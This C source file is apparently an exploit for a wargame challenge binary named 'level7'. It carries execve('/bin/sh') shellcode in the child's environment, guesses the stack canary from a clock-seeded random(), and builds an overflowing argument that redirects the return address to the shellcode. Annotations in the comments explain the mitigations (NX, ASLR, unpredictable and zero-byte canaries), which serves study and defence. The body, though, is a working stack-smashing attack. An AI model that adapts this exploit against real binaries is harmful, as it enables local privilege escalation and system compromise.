- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
/* Absolute path of the binary to execute, and the argv[0] it is started with. */
char target_path[] = "/home/level7/level7";
char target_name[] = "level7";

/*
 * NULL-terminated string array that main() passes to execle() as the child's
 * environment. Its single entry is machine code (per the author: spawns a
 * shell) followed by the "/bin/sh" path it refers to.
 *
 * Defender's note: running bytes that live in the environment requires an
 * executable stack; a non-executable stack (NX/DEP) blocks this placement.
 */
char *shellcode[] = {
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh",
    NULL
};
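/*
 * Builds one command-line argument and executes target_path with it, using
 * shellcode[] as the child's environment.
 *
 * Argument layout (84 bytes + NUL):
 *   64 filler | 4-byte canary guess | 12 filler | 4-byte return address
 *
 * Returns 1 if the target could not be executed; on success execle() does
 * not return, so nothing after it runs.
 *
 * Defender's notes:
 *  - The canary guess is the first random() value after seeding with the
 *    current second. NOTE(review): presumably the target derives its canary
 *    the same way; a canary must come from an unpredictable source (e.g.
 *    kernel-supplied random bytes), never from the clock.
 *  - The return address is computed from a fixed stack top. NOTE(review):
 *    this looks like the classic 32-bit layout with stack randomisation off;
 *    with ASLR enabled the address is not predictable.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    char arg[85];   /* <filler[64]><canary[4]><filler[12]><eip[4]> plus NUL */
    char canary[5]; /* canary guess as a little-endian byte string */
    char eip[5];    /* return address as a little-endian byte string */

    /*
     * Predicted address of shellcode[0] in the child: counted down from
     * 0xbffffffc past the program path and the payload string, each with
     * its terminating NUL.
     */
    unsigned int shaddr = 0xbffffffc - (strlen(target_path)+1 + strlen(shellcode[0])+1);

    /* Seed from the wall clock and take the first generated value. */
    srand(time(NULL));
    unsigned int r = random();

    /*
     * Serialise both 32-bit values least-significant byte first. They are
     * later consumed with %s, so a 0x00 byte in either value ends the string
     * early; that property is why hardened canaries contain a zero byte.
     */
    snprintf(canary, 5, "%c%c%c%c", (char)r&0x000000FF, (char)(r >> 8)&0x000000FF, (char)(r >> 16)&0x000000FF, (char)(r >> 24)&0x000000FF);
    snprintf(eip, 5, "%c%c%c%c", (char)shaddr&0x000000FF, (char)(shaddr >> 8)&0x000000FF, (char)(shaddr >> 16)&0x000000FF, (char)(shaddr >> 24)&0x000000FF);

    /* Assemble the argument in the layout described above. */
    snprintf(arg, 85, "----------------------------------------------------------------%s------------%s", canary, eip);

    /* Debug info */
    printf("Arg = %s\n", arg);
    printf("Canary = 0x%08X <-> %s\n", r, canary);
    printf("@sh = 0x%08x <-> eip = %s\n\n", shaddr, eip);

    execle(target_path, target_name, arg, (char *)0, shellcode);

    /*
     * execle() returns only on failure, and then always -1, so the original
     * `if (!execle(...))` test was never true and the failure went
     * unreported with exit status 0. Reaching this point means it failed.
     * perror() appends ": <reason>\n" itself, so the message carries no
     * trailing punctuation or newline.
     */
    perror("Unable to execute the target");
    return 1;
}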